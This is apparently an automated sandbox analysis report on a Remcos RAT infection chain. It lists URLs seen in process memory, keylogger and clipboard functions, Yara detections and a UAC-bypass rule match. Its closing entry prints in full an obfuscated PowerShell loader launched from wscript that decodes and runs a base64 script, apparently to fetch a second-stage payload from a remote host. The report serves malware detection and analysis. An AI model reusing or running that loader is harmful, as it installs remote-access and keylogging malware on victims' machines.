Source: svchost.exe, 0000000E.00000003.1364645984.0000029365832000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1364350143.0000029365861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000E.00000003.1363885308.0000029365835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364138584.000002936586A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365747346.000002936586B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000D.00000003.1204066669.0000021A94D60000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038845850.0000000005BF0000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr	String found in binary or memory: https://github.com/koswald/VBScript
Source: wscript.exe, 00000003.00000003.1039285589.00000000059DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039002518.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1040953290.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038755780.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038966575.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039048879.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041831687.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
Source: wscript.exe, 00000003.00000003.1039002518.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038755780.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038966575.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039048879.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsG
Source: wscript.exe, 00000003.00000003.1039285589.00000000059BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039285589.00000000059DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039002518.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1040953290.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038755780.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1043182015.00000000059B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1038966575.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045637073.00000000059BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1039048879.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041831687.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041475614.0000000005BFC000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
Source: powershell.exe, 00000005.00000002.1078641425.00000000057E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: recover.exe, 00000009.00000002.1150976955.0000000003198000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000002.1151189070.0000000003539000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1150494750.0000000003539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: recover.exe, 00000009.00000002.1150976955.0000000003198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: recover.exe, 00000009.00000002.1150976955.0000000003198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: recover.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000003.00000002.1044412866.0000000002ABA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041666626.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041729244.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000003.00000002.1044412866.0000000002ABA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041666626.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041729244.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/c
Source: wscript.exe, 00000003.00000002.1044310929.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1043888883.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045927535.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1044588740.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1042586627.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1044214581.0000000002A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041706954.0000000002A89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/c30NOIBR/0
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/c30NOIBR/0/
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000E.00000003.1364686741.000002936583E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1364686741.000002936583E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1363885308.0000029365835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: recover.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443

Source: unknown

HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49692 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000

8_2_00409D1E

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_0040B158

Contains functionality to modify clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	8_2_0041696E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	9_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	9_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	10_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	10_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	11_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	11_2_004072B5

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_0040B158

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

8_2_00409E4A

Yara detected Keylogger Generic

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041CF2D SystemParametersInfoW,

8_2_0041CF2D

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
